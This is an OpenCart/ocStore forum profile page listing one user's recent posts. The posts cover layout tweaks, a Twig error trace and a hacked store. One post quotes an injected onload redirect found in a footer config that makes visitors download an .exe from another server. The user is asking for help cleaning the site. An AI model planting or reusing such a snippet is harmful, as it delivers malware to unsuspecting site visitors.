Перейти к публикации
  • разработка интернет магазинов на opencart
  • доработка интернет магазинов на opencart

borborich

Пользователи
  
  • Публикаций

    304
  • Зарегистрирован

  • Посещение

Информация

  • Пол
    Мужчина

Посетители профиля

1 912 просмотров профиля

Достижения borborich

Rising Star

Rising Star (9/14)

  • Dedicated Редкая
  • First Post
  • Collaborator
  • Conversation Starter
  • Week One Done

Последние медали

1

Репутация

  1. borborich

    grid as default

    скрыл стилем кнопку, и так оставил, лучшего решения не нашел
  2. подскажите плиз, что то не нагуглил, выключил панель кнопок выбора лист или грид, все стало в лист, в коммон жс что то не нашел что поменять чтоб всегда было грид?
  3. подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда
  4. Нашелся в конфигах подвала newstore, теперь бы понять как он туда попал и как этого избежать @29aleksey есть предположения?
  5. Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';"> дают ноль результатов
  6. спасибо, собственно для этого и скачиваю
  7. ссыль на файл прям в боди вставляется, скачиваю файлы сайта на компьютер чтоб сканировать.
  8. Делал откат на месяц назад, тогда этой проблемы не было, но не помогло. Файл называется прайслист.exe качается с другого сервера.
  9. ocstore 2.3.0.2.3 newstore При посещении главной страницы сайта, загружается на компьютер exe файл c другого магазина сделаного также на opencart. обращение в поддержку хостинга особо не помогло. Где копать?
  10. Сначала смотрел в сторону какой либо CRM и в принципе во всех необходимый функционал есть, но задача гораздо проще, поэтому пушка для воробьев наверное и не нужна. Нужно что то вроде расширенной карточки покупателя в админке с возможностью загружать изображения. добавлять кастомные поля (что в принципе уже есть по дефолту) и выставлять статусы, которые возможно бы были видны в общем списке покупателей. пример задачи: клиент Вася пупкин паспорт клиента - загрузка картинки статус оплаты - оплатил 100 рублей статус задолжности - должен 50 рублей статус документов - получены И так далее в принципе все кроме загрузки картинок уже и так есть в карточке клиентов в админке, но может есть готовые решения, спасибо за помощь.
  11. ocstore 3 при попытке продавцом зайти в раздел "добавить товар" выдается: Fatal error: Uncaught Twig\Error\SyntaxError: Unexpected token "name" of value "OR" ("end of statement block" expected) in "default/template/mmtrade/account/add.twig" at line 749. in /var/home/dellorsa/storage_tuttivini/vendor/twig/twig/src/TokenStream.php:76 Stack trace: #0 /var/home/dellorsa/storage_tuttivini/vendor/twig/twig/src/TokenParser/IfTokenParser.php(38): Twig\TokenStream->expect(3) #1 /var/home/dellorsa/storage_tuttivini/vendor/twig/twig/src/Parser.php(185): Twig\TokenParser\IfTokenParser->parse(Object(Twig\Token)) #2 /var/home/dellorsa/storage_tuttivini/vendor/twig/twig/src/TokenParser/IfTokenParser.php(39): Twig\Parser->subparse(Array) #3 /var/home/dellorsa/storage_tuttivini/vendor/twig/twig/src/Parser.php(185): Twig\TokenParser\IfTokenParser->parse(Object(Twig\Token)) #4 /var/home/dellorsa/storage_tuttivini/vendor/twig/twig/src/TokenParser/ForTokenParser.php(52): Twig\Parser->subparse(Array) #5 /var/home/dellorsa/storage_tuttivini/vendor/twig/twig/src/Parser.php(185): Twig\TokenParser\ForTokenParser->parse( in /var/home/dellorsa/storage_tuttivini/vendor/twig/twig/src/TokenStream.php on line 76
×
×
  • Создать...

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.